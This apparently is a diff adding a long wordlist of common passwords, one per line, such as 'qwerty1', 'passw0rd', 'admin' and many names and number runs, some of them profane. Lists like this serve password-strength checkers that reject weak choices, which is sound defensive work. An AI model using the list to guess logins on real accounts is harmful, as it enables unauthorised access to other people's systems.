+insane
+inside
+irish
+ironman
+jake
+jasmin
+jeanne
+jerry
+joey
+justice
+katherine
+kermit
+kitty
+koala
+larry
+leslie
+logan
+lucky
+mark
+martin
+matt
+minnie
+misty
+mitch
+mouse
+nancy
+nascar
+nelson
+pantera
+parker
+penguin
+peter
+piano
+pizza
+prince
+punkin
+pyramid
+raymond
+robin
+roger
+rosebud
+route66
+royal
+running
+sadie
+sasha
+security
+sheena
+sheila
+skiing
+snapple
+snowball
+sparrow
+spencer
+spike
+star
+stealth
+student
+sunny
+sylvia
+tamara
+taurus
+teresa
+theresa
+thunderbird
+tigers
+tony
+toyota
+travel
+tuesday
+victory
+viper1
+wesley
+whisky
+winnie
+winter
+wolves
+xyz123
+zorro
+123123
+1234567
+696969
+888888
+Anthony
+Joshua
+Matthew
+Tigger
+aaron
+abby
+abcdef
+adidas
+adrian
+alfred
+arthur
+athena
+austin
+awesome
+badger
+bamboo
+beagle
+bears
+beatles
+beautiful
+beaver
+benny
+bigmac
+bingo
+bitch
+blonde
+boogie
+boston
+brenda
+bright
+bubba1
+bubbles
+buffy
+button
+buttons
+cactus
+candy
+captain
+carlos
+caroline
+carrie
+casper
+catch22
+chance
+charity
+charlotte
+cheese
+cheryl
+chloe
+chris1
+clancy
+compaq
+conrad
+cooper
+cooter
+copper
+cosmos
+cougar
+cracker
+crawford
+crystal
+curtis
+cyclone
+dance
+diablo
+dollars
+dookie
+dumbass
+dundee
+elizabeth
+eric
+europe
+farmer
+firebird
+fletcher
+fluffy
+france
+freak1
+friends
+fuckoff
+gabriel
+galaxy
+gambit
+garden
+garfield
+garnet
+genesis
+genius
+godzilla
+golfer
+goober
+grace
+greenday
+groovy
+grover
+guitar
+hacker
+harry
+hazel
+hector
+herbert
+horizon
+hornet
+howard
+icecream
+imagine
+impala
+jack
+janice
+jasmine
+jason1
+jeanette
+jeffrey
+jenifer
+jenni
+jesus1
+jewels
+joker
+julie
+julie1
+junior
+justin1
+kathleen
+keith
+kelly
+kelly1
+kennedy
+kevin1
+knicks
+larry1
+leonard
+lestat
+library
+lincoln
+lionking
+london
+louise
+lucky1
+lucy
+maddog
+margaret
+mariposa
+marlboro
+martin1
+marty
+master1
+mensuck
+mercedes
+metal
+midori
+mikey
+millie
+mirage
+molly
+monet
+money1
+monica
+monopoly
+mookie
+moose
+moroni
+music
+naomi
+nathan
+nguyen
+nicholas
+nicole
+nimrod
+october
+olive
+olivia
+online
+oscar
+oxford
+pacific
+painter
+peaches
+penelope
+pepsi
+petunia
+philip
+phoenix1
+photo
+pickle
+player
+poiuyt
+porsche
+porter
+puppy
+python
+quality
+raquel
+raven
+remember
+robbie
+robert1
+roman
+rugby
+runner
+russell
+ryan
+sailing
+sailor
+samantha
+savage
+scarlett
+school
+sean
+seven
+shadow1
+sheba
+shelby
+shit
+shoes
+simba
+simple
+skipper
+smiley
+snake
+snickers
+sniper
+snoopdog
+snowman
+sonic
+spitfire
+sprite
+spunky
+starwars
+station
+stella
+stingray
+storm
+stormy
+stupid
+sunny1
+sunrise
+surfer
+susan
+tammy
+tango
+tanya
+teddy1
+theboss
+theking
+thumper
+tina
+tintin
+tomcat
+trebor
+trevor
+tweety
+unicorn
+valentine
+valerie
+vanilla
+veronica
+victor
+vincent
+viper
+warrior
+warriors
+weasel
+wheels
+wilbur
+winston
+wisdom
+wombat
+xavier
+yellow
+zeppelin
+1111
+1212
+Andrew
+Family
+Friends
+Michael
+Michelle
+Snoopy
+abcd1234
+abcdefg
+abigail
+account
+adam
+alex1
+alice1
+allison
+alpine
+andre1
+andrea1
+angel1
+anita
+annette
+antares
+apache
+apollo
+aragorn
+arizona
+arnold
+arsenal
+asdfasdf
+asdfg
+asdfghjk
+avenger
+baby
+babydoll
+bailey
+banana
+barry
+basket
+batman1
+beaner
+beast
+beatrice
+bella
+bertha
+bigben
+bigdog
+biggles
+bigman
+binky
+biology
+bishop
+blondie
+bluefish
+bobcat
+bosco
+braves
+brazil
+bruce
+bruno
+brutus
+buffalo
+bulldog
+bullet
+bullshit
+bunny
+business
+butch
+butler
+butter
+california
+carebear
+carol
+carol1
+carole
+cassie
+castle
+catalina
+catherine
+cccccc
+celine
+center
+champion
+chanel
+chaos
+chelsea1
+chester1
+chicago
+chico
+christian
+christy
+church
+cinder
+colleen
+colorado
+columbia
+commander
+connie
+cookies
+cooking
+corona
+cowboys
+coyote
+craig
+creative
+cuddles
+cuervo
+cutie
+daddy
+daisy
+daniel1
+danielle
+davids
+death
+denis
+derek
+design
+destiny
+diana
+diane
+dickhead
+digger
+dodger
+donna
+dougie
+dragonfly
+dylan
+eagle
+eclipse
+electric
+emerald
+etoile
+excalibur
+express
+fender
+fiona
+fireman
+flash
+florida
+flowers
+foster
+francesco
+francine
+francois
+frank
+french
+fuckface
+gemini
+general
+gerald
+germany
+gilbert
+goaway
+golden
+goldfish
+goose
+gordon
+graham
+grant
+gregory
+gretchen
+gunner
+hannah
+harold
+harrison
+harvey
+hawkeye
+heaven
+heidi
+helen
+helena
+hithere
+hobbit
+ibanez
+idontknow
+integra
+ireland
+irene
+isaac
+isabel
+jackass
+jackie
+jackson
+jaguar
+jamaica
+japan
+jenny1
+jessie
+johan
+johnny
+joker1
+jordan23
+judith
+julia
+jumanji
+kangaroo
+karen1
+kathy
+keepout
+keith1
+kenneth
+kimberly
+kingdom
+kitkat
+kramer
+kristen
+laura
+laurie
+lawrence
+lawyer
+legend
+liberty
+light
+lindsay
+lindsey
+lisa
+liverpool
+lola
+lonely
+louis
+lovely
+loveme
+lucas
+madonna
+malcolm
+malibu
+marathon
+marcel
+maria1
+mariah
+mariah1
+marilyn
+mario
+marvin
+maurice
+maxine
+maxwell
+me
+meggie
+melanie
+melissa
+melody
+mexico
+michael1
+michele
+midnight
+mike1
+miracle
+misha
+mishka
+molly1
+monique
+montreal
+moocow
+moore
+morris
+mouse1
+mulder
+nautica
+nellie
+newton
+nick
+nirvana1
+nissan
+norman
+notebook
+ocean
+olivier
+ollie
+oranges
+oregon
+orion
+panda
+pandora
+panther
+passion
+patricia
+pearl
+peewee
+pencil
+penny
+people
+percy
+person
+peter1
+petey
+picasso
+pierre
+pinkfloyd
+polaris
+police
+pookie1
+poppy
+power
+predator
+preston
+q1w2e3
+queen
+queenie
+quentin
+ralph
+random
+rangers
+raptor
+reality
+redrum
+remote
+reynolds
+rhonda
+ricardo
+ricardo1
+ricky
+river
+roadrunner
+robinhood
+rocknroll
+rocky1
+ronald
+roxy
+ruthie
+sabrina
+sakura
+sally
+sampson
+samuel
+sandra
+santa
+sapphire
+scarlet
+scorpio
+scott1
+scottie
+scruffy
+seattle
+serena
+shanti
+shark
+shogun
+simon
+singer
+skull
+skywalker
+slacker
+smashing
+smiles
+snowflake
+snuffy
+soccer1
+soleil
+sonny
+spanky
+speedy
+spider
+spooky
+stacey
+star69
+start
+steven1
+stinky
+strawberry
+stuart
+sugar
+sundance
+superfly
+suzanne
+suzuki
+swimmer
+swimming
+system
+taffy
+tarzan
+teddy
+teddybear
+terry
+theatre
+thunder
+thursday
+tinker
+tootsie
+tornado
+tracy
+tricia
+trident
+trojan
+truman
+trumpet
+tucker
+turtle
+tyler
+utopia
+voyager
+warcraft
+warlock
+warren
+water
+wayne
+wendy
+williams
+willy
+winona
+woody
+woofwoof
+wrangler
+wright
+xfiles
+xxxxxx
+yankees
+yvonne
+zebra
+zenith
+zigzag
+zombie
+zxc123
+zxcvb
+000000
+007007
+11111
+11111111
+123321
+171717
+181818
+1a2b3c
+1chris
+4runner
+54321
+55555
+6969
+7777777
+789456
+88888888
+Alexis
+Bailey
+Charlie
+Chris
+Daniel
+Dragon
+Elizabeth
+HARLEY
+Heather
+Jennifer
+Jessica
+Jordan
+KILLER
+Nicholas
+Password
+Princess
+Purple
+Rebecca
+Robert
+Shadow
+Steven
+Summer
+Sunshine
+Superman
+Taylor
+Thomas
+Victoria
+abcd123
+abcde
+accord
+active
+africa
+airborne
+alfaro
+alicia
+aliens
+alina
+aline
+alison
+allen
+aloha
+alpha1
+althea
+altima
+amanda1
+amazing
+america
+amour
+anderson
+andre
+andrew1
+andromeda
+angels
+angie1
+annie
+anything
+apple1
+apple2
+applepie
+april
+aquarius
+ariane
+ariel
+arlene
+artemis
+asdf1234
+asdfjkl
+ashley1
+ashraf
+ashton
+asterix
+attila
+autumn
+avatar
+babes
+bambi
+barbie
+barney1
+barrett
+bball
+beaches
+beanie
+beans
+beauty
+becca
+belize
+belle
+belmont
+benji
+benson
+bernardo
+berry
+betsy
+betty
+bigboss
+bigred
+billy1
+birdie
+birthday
+biscuit
+bitter
+blackjack
+blah
+blanche
+blood
+blowjob
+blowme
+blueeyes
+blues
+bogart
+bombay
+boobie
+boots
+bootsie
+boxers
+brandi
+brent
+brewster
+bridge
+bronco
+bronte
+brooke
+brother
+bryan
+bubble
+buddha
+budgie
+burton
+butterfly
+byron
+calendar
+calvin1
+camel
+camille
+campbell
+camping
+cancer
+canela
+cannon
+carbon
+carnage
+carolyn
+carrot
+cascade
+catfish
+cathy
+catwoman
+cecile
+celica
+change
+chantal
+charger
+cherry
+chiara
+chiefs
+china
+chris123
+christ1
+christmas
+christopher
+chuck
+cindy1
+cinema
+civic
+claude
+clueless
+cobain
+cobra
+cody
+colette
+college
+colors
+colt45
+confused
+cool
+corvette
+cosmo
+country
+crusader
+cunningham
+cupcake
+cynthia
+dagger
+dammit
+dancer
+daphne
+darkstar
+darren
+darryl
+darwin
+deborah
+december
+deedee
+deeznuts
+delano
+delete
+demon
+denise
+denny
+desert
+deskjet
+detroit
+devil
+devine
+devon
+dexter
+dianne
+diesel
+director
+dixie
+dodgers
+doggy
+dollar
+dolly
+dominique
+domino
+dontknow
+doogie
+doudou
+downtown
+dragon1
+driver
+dude
+dudley
+dutchess
+dwight
+eagle1
+easter
+eastern
+edith
+edmund
+eight
+element
+elissa
+ellen
+elliot
+empire
+enigma
+enterprise
+erin
+escort
+estelle
+eugene
+evelyn
+explore
+family1
+fatboy
+felipe
+ferguson
+ferret
+ferris
+fireball
+fishes
+fishie
+flight
+florida1
+flowerpot
+forward
+freddie
+freebird
+freeman
+frisco
+fritz
+froggie
+froggies
+frogs
+fucku
+future
+gabby
+games
+garcia
+gaston
+gateway
+george1
+georgia
+german
+germany1
+getout
+ghost
+gibson
+giselle
+gmoney
+goblin
+goblue
+gollum
+grandma
+gremlin
+grizzly
+grumpy
+guess
+guitar1
+gustavo
+haggis
+haha
+hailey
+halloween
+hamilton
+hamlet
+hanna
+hanson
+happy123
+happyday
+hardcore
+harley1
+harriet
+harris
+harvard
+health
+heart
+heather1
+heather2
+hedgehog
+helene
+hello1
+hello123
+hellohello
+hermes
+heythere
+highland
+hilda
+hillary
+history
+hitler
+hobbes
+holiday
+holly
+honda1
+hongkong
+hootie
+horse
+hotrod
+hudson
+hummer
+huskies
+idiot
+iforget
+iloveu
+impact
+indonesia
+irina
+isabelle
+israel
+italia
+italy
+jackie1
+jacob
+jakey
+james1
+jamesbond
+jamie
+jamjam
+jeffrey1
+jennie
+jenny
+jensen
+jesse
+jesse1
+jester
+jethro
+jimbob
+jimmy
+joanna
+joelle
+john316
+jordie
+jorge
+josh
+journey
+joyce
+jubilee
+jules
+julien
+juliet
+junebug
+juniper
+justdoit
+karin
+karine
+karma
+katerina
+katie
+katie1
+kayla
+keeper
+keller
+kendall
+kenny
+ketchup
+kings
+kissme
+kitten
+kittycat
+kkkkkk
+kristi
+kristine
+labtec
+laddie
+ladybug
+lance
+laurel
+lawson
+leader
+leland
+lemon
+lester
+letter
+letters
+lexus1
+libra
+lights
+lionel
+little
+lizzy
+lolita
+lonestar
+longhorn
+looney
+loren
+lorna
+loser
+lovers
+loveyou
+lucia
+lucifer
+lucky14
+maddie
+madmax
+magic1
+magnum
+maiden
+maine
+management
+manson
+manuel
+marcus
+maria
+marielle
+marine
+marino
+marshall
+martha
+maxmax
+meatloaf
+medical
+megan
+melina
+memphis
+mermaid
+miami
+michel
+michigan
+mickey1
+microsoft
+mikael
+milano
+miles
+millenium
+million
+miranda
+miriam
+mission
+mmmmmm
+mobile
+monkey1
+monroe
+montana
+monty
+moomoo
+moonbeam
+morpheus
+motorola
+movies
+mozart
+munchkin
+murray
+mustang1
+nadia
+nadine
+napoleon
+nation
+national
+nestle
+newlife
+newyork1
+nichole
+nikita
+nikki
+nintendo
+nokia
+nomore
+normal
+norton
+noway
+nugget
+number9
+numbers
+nurse
+nutmeg
+ohshit
+oicu812
+omega
+openup
+orchid
+oreo
+orlando
+packard
+packers
+paloma
+pancake
+panic
+parola
+parrot
+partner
+pascal
+patches
+patriots
+paula
+pauline
+payton
+peach
+peanuts
+pedro1
+peggy
+perfect
+perry
+peterpan
+philips
+phillips
+phone
+pierce
+pigeon
+pink
+pioneer
+piper1
+pirate
+pisces
+playboy
+pluto
+poetry
+pontiac
+pookey
+popeye
+prayer
+precious
+prelude
+premier
+puddin
+pulsar
+pussy
+pussy1
+qwert
+qwerty12
+qwertyui
+rabbit1
+rachelle
+racoon
+rambo
+randy1
+ravens
+redman
+redskins
+reggae
+reggie
+renee
+renegade
+rescue
+revolution
+richard1
+richards
+richmond
+riley
+ripper
+robby
+roberts
+rock
+rocket1
+rockie
+rockon
+roger1
+rogers
+roland
+rommel
+rookie
+rootbeer
+rosie
+rufus
+rusty
+ruthless
+sabbath
+sabina
+safety
+saint
+samiam
+sammie
+sammy
+samsam
+sandi
+sanjose
+saphire
+sarah1
+saskia
+sassy
+saturday
+science
+scooby
+scoobydoo
+scooter1
+scorpion
+scotty
+scouts
+search
+september
+server
+seven7
+sexy
+shaggy
+shanny
+shaolin
+shasta
+shayne
+shelly
+sherry
+shirley
+shorty
+shotgun
+sidney
+simba1
+sinatra
+sirius
+skate
+skipper1
+skyler
+slayer
+sleepy
+slider
+smile1
+smitty
+smoke
+snakes
+snapper
+snoop
+solomon
+sophia
+space
+sparks
+spartan
+spike1
+sponge
+spurs
+squash
+stargate
+starlight
+stars
+steph1
+steve1
+stevens
+stewart
+stone
+stranger
+stretch
+strong
+studio
+stumpy
+sucker
+suckme
+sultan
+summit
+sunfire
+sunset
+super
+superstar
+surfing
+susan1
+sutton
+sweden
+sweetpea
+sweety
+swordfish
+tabatha
+tacobell
+taiwan
+tamtam
+tanner
+target
+tasha
+tattoo
+tequila
+terry1
+texas
+thankyou
+theend
+thompson
+thrasher
+tiger2
+timber
+timothy
+tinkerbell
+topcat
+topher
+toshiba
+tototo
+travis
+treasure
+trees
+tricky
+trish
+triton
+trombone
+trouble
+trucker
+turbo
+twins
+tyler1
+ultimate
+unique
+united
+ursula
+vacation
+valley
+vampire
+vanessa
+venice
+venus
+vermont
+vicki
+vicky
+victor1
+vincent1
+violet
+violin
+virgil
+virginia
+vision
+volley
+voodoo
+vortex
+waiting
+wanker
+warner
+water1
+wayne1
+webster
+weezer
+wendy1
+western
+white
+whitney
+whocares
+wildcat
+william1
+wilma
+window
+winniethepooh
+wolfgang
+wolverine
+wonder
+xxxxxxxx
+yamaha
+yankee
+yogibear
+yolanda
+yomama
+yvette
+zachary
+zebras
+zxcvbn
+00000000
+121212
+1234qwer
+131313
+13579
+90210
+99999999
+ABC123
+action
+amelie
+anaconda
+apollo13
+artist
+asshole
+benoit
+bernard
+bernie
+bigbird
+blizzard
+bluesky
+bonjour
+caesar
+cardinal
+carolina
+cesar
+chandler
+chapman
+charlie1
+chevy
+chiquita
+chocolat
+coco
+cougars
+courtney
+dolphins
+dominic
+donkey
+dusty
+eminem
+energy
+fearless
+forest
+forever
+glenn
+guinness
+hotdog
+indian
+jared
+jimbo
+johnson
+jojo
+josie
+kristin
+lloyd
+lorraine
+lynn
+maxime
+memory
+mimi
+mirror
+nebraska
+nemesis
+network
+nigel
+oatmeal
+patton
+pedro
+planet
+players
+portland
+praise
+psalms
+qwaszx
+raiders
+rambo1
+rancid
+shawn
+shelley
+softball
+speedo
+sports
+ssssss
+steele
+steph
+stephani
+sunday
+tiffany
+tigre
+toronto
+trixie
+undead
+valentin
+velvet
+viking
+walker
+watson
+young
+babygirl
+pretty
+hottie
+teamo
+987654321
+naruto
+spongebob
+daniela
+princesa
+christ
+blessed
+single
+qazwsx
+pokemon
+iloveyou1
+iloveyou2
+fuckyou1
+hahaha
+poop
+blessing
+blahblah
+blink182
+123qwe
+trinity
+passw0rd
+google
+looking
+spirit
+iloveyou!
+qwerty1
+onelove
+mylove
+222222
+ilovegod
+football1
+loving
+emmanuel
+1q2w3e4r
+red123
+blabla
+112233
+hallo
+spiderman
+simpsons
+monster
+november
+brooklyn
+poopoo
+darkness
+159753
+pineapple
+chester
+1qaz2wsx
+drowssap
+monkey12
+wordpass
+q1w2e3r4
+coolness
+11235813
+something
+alexandra
+estrella
+miguel
+iloveme
+sayang
+princess1
+555555
+999999
+alejandro
+brittany
+alejandra
+tequiero
+antonio
+987654
+00000
+fernando
+corazon
+cristina
+kisses
+myspace
+rebelde
+babygurl
+alyssa
+mahalkita
+gabriela
+pictures
+hellokitty
+babygirl1
+angelica
+mahalko
+mariana
+eduardo
+andres
+ronaldo
+inuyasha
+adriana
+celtic
+samsung
+angelo
+456789
+sebastian
+karina
+hotmail
+0123456789
+barcelona
+cameron
+slipknot
+cutiepie
+50cent
+bonita
+maganda
+babyboy
+natalie
+cuteako
+javier
+789456123
+123654
+bowwow
+portugal
+777777
+volleyball
+january
+cristian
+bianca
+chrisbrown
+101010
+sweet
+panget
+benfica
+love123
+lollipop
+camila
+qwertyuiop
+harrypotter
+ihateyou
+christine
+lorena
+andreea
+charmed
+rafael
+brianna
+aaliyah
+johncena
+lovelove
+gangsta
+333333
+hiphop
+mybaby
+sergio
+metallica
+myspace1
+babyblue
+badboy
+fernanda
+westlife
+sasuke
+steaua
+roberto
+slideshow
+asdfghjkl
+santiago
+jayson
+5201314
+jerome
+gandako
+gatita
+babyko
+246810
+sweetheart
+chivas
+alberto
+valeria
+nicole1
+12345678910
+leonardo
+jayjay
+liliana
+sexygirl
+232323
+amores
+anthony1
+bitch1
+fatima
+miamor
+lover
+lalala
+252525
+skittles
+colombia
+159357
+manutd
+123456a
+britney
+katrina
+christina
+pasaway
+mahal
+tatiana
+cantik
+0123456
+teiubesc
+147258369
+natalia
+francisco
+amorcito
+paola
+angelito
+manchester
+mommy1
+147258
+amigos
+marlon
+linkinpark
+147852
+diego
+444444
+iverson
+andrei
+justine
+frankie
+pimpin
+fashion
+bestfriend
+england
+hermosa
+456123
+102030
+sporting
+hearts
+potter
+iloveu2
+number1
+212121
+truelove
+jayden
+savannah
+hottie1
+ganda
+scotland
+ilovehim
+shakira
+estrellita
+brandon1
+sweets
+familia
+love12
+omarion
+monkeys
+loverboy
+elijah
+ronnie
+mamita
+999999999
+broken
+rodrigo
+westside
+mauricio
+amigas
+preciosa
+shopping
+flores
+isabella
+martinez
+elaine
+friendster
+cheche
+gracie
+connor
+valentina
+darling
+santos
+joanne
+fuckyou2
+pebbles
+sunshine1
+gangster
+gloria
+darkangel
+bettyboop
+jessica1
+cheyenne
+dustin
+iubire
+a123456
+purple1
+bestfriends
+inlove
+batista
+karla
+chacha
+marian
+sexyme
+pogiako
+jordan1
+010203
+daddy1
+daddysgirl
+billabong
+pinky
+erika
+skater
+nenita
+tigger1
+gatito
+lokita
+maldita
+buttercup
+bambam
+glitter
+123789
+sister
+zacefron
+tokiohotel
+loveya
+lovebug
+bubblegum
+marissa
+cecilia
+lollypop
+nicolas
+puppies
+ariana
+chubby
+sexybitch
+roxana
+mememe
+susana
+baller
+hotstuff
+carter
+babylove
+angelina
+playgirl
+sweet16
+012345
+bhebhe
+marcos
+loveme1
+milagros
+lilmama
+beyonce
+lovely1
+catdog
+armando
+margarita
+151515
+loves
+202020
+gerard
+undertaker
+amistad
+capricorn
+delfin
+cheerleader
+password2
+PASSWORD
+lizzie
+matthew1
+enrique
+badgirl
+141414
+dancing
+cuteme
+amelia
+skyline
+angeles
+janine
+carlitos
+justme
+legolas
+michelle1
+cinderella
+jesuschrist
+ilovejesus
+tazmania
+tekiero
+thebest
+princesita
+lucky7
+jesucristo
+buddy1
+regina
+myself
+lipgloss
+jazmin
+rosita
+chichi
+pangit
+mierda
+741852963
+hernandez
+arturo
+silvia
+melvin
+celeste
+pussycat
+gorgeous
+honeyko
+mylife
+babyboo
+loveu
+lupita
+panthers
+hollywood
+alfredo
+musica
+hawaii
+sparkle
+kristina
+sexymama
+crazy
+scarface
+098765
+hayden
+micheal
+242424
+0987654321
+marisol
+jeremiah
+mhine
+isaiah
+lolipop
+butterfly1
+xbox360
+madalina
+anamaria
+yourmom
+jasmine1
+bubbles1
+beatriz
+diamonds
+friendship
+sweetness
+desiree
+741852
+hannah1
+bananas
+julius
+leanne
+marie1
+lover1
+twinkle
+february
+bebita
+87654321
+twilight
+imissyou
+pollito
+ashlee
+cookie1
+147852369
+beckham
+simone
+nursing
+torres
+damian
+123123123
+joshua1
+babyface
+dinamo
+mommy
+juliana
+cassandra
+redsox
+gundam
+0000
+ou812
+dave
+golf
+molson
+Monday
+newpass
+thx1138
+1
+Internet
+coke
+foobar
+abc
+fish
+fred
+help
+ncc1701d
+newuser
+none
+pat
+dog
+duck
+duke
+floyd
+guest
+joe
+kingfish
+micro
+sam
+telecom
+test1
+7777
+absolut
+babylon5
+backup
+bill
+bird33
+deliver
+fire
+flip
+galileo
+gopher
+hansolo
+jane
+jim
+mom
+passwd
+phil
+phish
+porsche911
+rain
+red
+sergei
+training
+truck
+video
+volvo
+007
+1969
+5683
+Bond007
+Friday
+Hendrix
+October
+Taurus
+aaa
+alexandr
+catalog
+challenge
+clipper
+coltrane
+cyrano
+dan
+dawn
+dean
+deutsch
+dilbert
+e-mail
+export
+ford
+fountain
+fox
+frog
+gabriell
+garlic
+goforit
+grateful
+hoops
+lady
+ledzep
+lee
+mailman
+mantra
+market
+mazda1
+metallic
+ncc1701e
+nesbitt
+open
+pete
+quest
+republic
+research
+supra
+tara
+testing
+xanadu
+xxxx
+zaphod
+zeus
+0007
+1022
+10sne1
+1973
+1978
+2000
+2222
+3bears
+Broadway
+Fisher
+Jeanne
+Killer
+Knight
+Master
+Pepper
+Sierra
+Tennis
+abacab
+abcd
+ace
+acropolis
+amy
+anders
+avenir
+basil
+bass
+beer
+ben
+bliss
+blowfish
+boss
+bridges
+buck
+bugsy
+bull
+cannondale
+canon
+catnip
+chip
+civil
+content
+cook
+cordelia
+crack1
+cyber
+daisie
+dark1
+database
+deadhead
+denali
+depeche
+dickens
+emmitt
+entropy
+farout
+farside
+feedback
+fidel
+firenze
+fish1
+fletch
+fool
+fozzie
+fun
+gargoyle
+gasman
+gold
+graphic
+hell
+image
+intern
+intrepid
+jeff
+jkl123
+joel
+johanna1
+kidder
+kim
+king
+kirk
+kris
+lambda
+leon
+logical
+lorrie
+major
+mariner
+mark1
+max
+media
+merlot
+midway
+mine
+mmouse
+moon
+mopar
+mortimer
+nermal
+nina
+olsen
+opera
+overkill
+pacers
+packer
+picard
+polar
+polo
+primus
+prometheus
+public
+radio
+rastafarian
+reptile
+rob
+robotech
+rodeo
+rolex
+rouge
+roy
+ruby
+salasana
+scarecrow
+scout
+scuba1
+sergey
+skibum
+skunk
+sound
+starter
+sting1
+sunbird
+tbird
+teflon
+temporal
+terminal
+the
+thejudge
+time
+toby
+today
+tokyo
+tree
+trout
+vader
+val
+valhalla
+windsurf
+wolf
+wolf1
+xcountry
+yoda
+yukon
+1213
+1214
+1225
+1313
+1818
+1975
+1977
+1991
+1kitty
+2001
+2020
+2112
+2kids
+333
+4444
+5050
+57chevy
+7dwarfs
+Animals
+Ariel
+Bismillah
+Booboo
+Boston
+Carol
+Computer
+Creative
+Curtis
+Denise
+Eagles
+Esther
+Fishing
+Freddy
+Gandalf
+Golden
+Goober
+Hacker
+Harley
+Henry
+Hershey
+Jackson
+Jersey
+Joanna
+Johnson
+Katie
+Kitten
+Liberty
+Lindsay
+Lizard
+Madeline
+Margaret
+Maxwell
+Money
+Monster
+Pamela
+Peaches
+Peter
+Phoenix
+Piglet
+Pookie
+Rabbit
+Raiders
+Random
+Russell
+Sammy
+Saturn
+Skeeter
+Smokey
+Sparky
+Speedy
+Sterling
+Theresa
+Thunder
+Vincent
+Willow
+Winnie
+Wolverine
+aaaa
+aardvark
+abbott
+acura
+admin
+admin1
+adrock
+aerobics
+agent
+airwolf
+ali
+alien
+allegro
+allstate
+altamira
+altima1
+andrew!
+ann
+anne
+anneli
+aptiva
+arrow
+asdf;lkj
+assmunch
+baraka
+barnyard
+bart
+bartman
+beasty
+beavis1
+bebe
+belgium
+beowulf
+beryl
+best
+bharat
+bichon
+bigal
+biker
+bilbo
+bills
+bimmer
+biochem
+birdy
+blinds
+blitz
+bluejean
+bogey
+bogus
+boulder
+bourbon
+boxer
+brain
+branch
+britain
+broker
+bucks
+buffett
+bugs
+bulls
+burns
+buzz
+c00per
+calgary
+camay
+carl
+cat
+cement
+cessna
+chad
+chainsaw
+chameleon
+chang
+chess
+chinook
+chouette
+chronos
+cicero
+circuit
+cirque
+cirrus
+clapton
+clarkson
+class
+claudel
+cleo
+cliff
+clock
+color
+comet
+concept
+concorde
+coolbean
+corky
+cornflake
+corwin
+cows
+crescent
+cross
+crowley
+cthulhu
+cunt
+current
+cutlass
+daedalus
+dagger1
+daily
+dale
+dana
+daytek
+dead
+decker
+dharma
+dillweed
+dipper
+disco
+dixon
+doitnow
+doors
+dork
+doug
+dutch
+effie
+ella
+elsie
+engage
+eric1
+ernie1
+escort1
+excel
+faculty
+fairview
+faust
+fenris
+finance
+first
+fishhead
+flanders
+fleurs
+flute
+flyboy
+flyer
+franka
+frederic
+free
+front242
+frontier
+fugazi
+funtime
+gaby
+gaelic
+gambler
+gammaphi
+garfunkel
+garth
+gary
+gateway2
+gator1
+gibbons
+gigi
+gilgamesh
+goat
+godiva
+goethe
+gofish
+good
+gramps
+gravis
+gray
+greed
+greg
+greg1
+greta
+gretzky
+guido
+gumby
+h2opolo
+hamid
+hank
+hawkeye1
+health1
+hello8
+help123
+helper
+homerj
+hoosier
+hope
+huang
+hugo
+hydrogen
+ib6ub9
+insight
+instructor
+integral
+iomega
+iris
+izzy
+jazz
+jean
+jeepster
+jetta1
+joanie
+josee
+joy
+julia2
+jumbo
+jump
+justice4
+kalamazoo
+kali
+kat
+kate
+kerala
+kids
+kiwi
+kleenex
+kombat
+lamer
+laser
+laserjet
+lassie1
+leblanc
+legal
+leo
+life
+lions
+liz
+logger
+logos
+loislane
+loki
+longer
+lori
+lost
+lotus
+lou
+macha
+macross
+madoka
+makeitso
+mallard
+marc
+math
+mattingly
+mechanic
+meister
+mercer
+merde
+merrill
+michal
+michou
+mickel
+minou
+mobydick
+modem
+mojo
+montana3
+montrose
+motor
+mowgli
+mulder1
+muscle
+neil
+neutrino
+newaccount
+nicklaus
+nightshade
+nightwing
+nike
+none1
+nopass
+nouveau
+novell
+oaxaca
+obiwan
+obsession
+orville
+otter
+ozzy
+packrat
+paint
+papa
+paradigm
+pass
+pavel
+peterk
+phialpha
+phishy
+piano1
+pianoman
+pianos
+pipeline
+plato
+play
+poetic
+print
+printing
+provider
+qqq111
+quebec
+qwer
+racer
+racerx
+radar
+rafiki
+raleigh
+rasta1
+redcloud
+redfish
+redwing
+redwood
+reed
+rene
+reznor
+rhino
+ripple
+rita
+robocop
+robotics
+roche
+roni
+rossignol
+rugger
+safety1
+saigon
+satori
+saturn5
+schnapps
+scotch
+scuba
+secret3
+seeker
+services
+sex
+shanghai
+shazam
+shelter
+sigmachi
+signal
+signature
+simsim
+skydive
+slick
+smegma
+smiths
+smurfy
+snow
+sober1
+sonics
+sony
+spazz
+sphynx
+spock
+spoon
+spot
+sprocket
+starbuck
+steel
+stephi
+sting
+stocks
+storage
+strat
+strato
+stud
+student2
+susanna
+swanson
+swim
+switzer
+system5
+t-bone
+talon
+tarheel
+tata
+tazdevil
+tester
+testtest
+thisisit
+thorne
+tightend
+tim
+tom
+tool
+total
+toucan
+transfer
+transit
+transport
+trapper
+trash
+trophy
+tucson
+turbo2
+unity
+upsilon
+vedder
+vette
+vikram
+virago
+visual
+volcano
+walden
+waldo
+walleye
+webmaster
+wedge
+whale1
+whit
+whoville
+wibble
+will
+wombat1
+word
+world
+x-files
+xxx123
+zack
+zepplin
+zoltan
+zoomer
+123go
+21122112
+5555
+911
+FuckYou
+Fuckyou
+Gizmo
+Hello
+Michel
+Qwerty
+Windows
+angus
+aspen
+ass
+bird
+booster
+byteme
+cats
+changeit
+christia
+christoph
+classroom
+cloclo
+corrado
+dasha
+fiction
+french1
+fubar
+gator
+gilles
+gocougs
+hilbert
+hola
+home
+judy
+koko
+lulu
+mac
+macintosh
+mailer
+mars
+meow
+ne1469
+niki
+paul
+politics
+pomme
+property
+ruth
+sales
+salut
+scrooge
+skidoo
+spain
+surf
+sylvie
+symbol
+forum
+rotimi
+god
+saved
+2580
+1998
+xxx
+1928
+777
+info
+a
+netware
+sun
+tech
+doom
+mmm
+one
+ppp
+1911
+1948
+1996
+5252
+Champs
+Tuesday
+bach
+crow
+don
+draft
+hal9000
+herzog
+huey
+jethrotull
+jussi
+mail
+miki
+nicarao
+snowski
+1316
+1412
+1430
+1952
+1953
+1955
+1956
+1960
+1964
+1qw23e
+22
+2200
+2252
+3010
+3112
+4788
+6262
+Alpha
+Bastard
+Beavis
+Cardinal
+Celtics
+Cougar
+Darkman
+Figaro
+Fortune
+Geronimo
+Hammer
+Homer
+Janet
+Mellon
+Merlot
+Metallic
+Montreal
+Newton
+Paladin
+Peanuts
+Service
+Vernon
+Waterloo
+Webster
+aki123
+aqua
+aylmer
+beta
+bozo
+car
+chat
+chinacat
+cora
+courier
+dogbert
+eieio
+elina1
+fly
+funguy
+fuzz
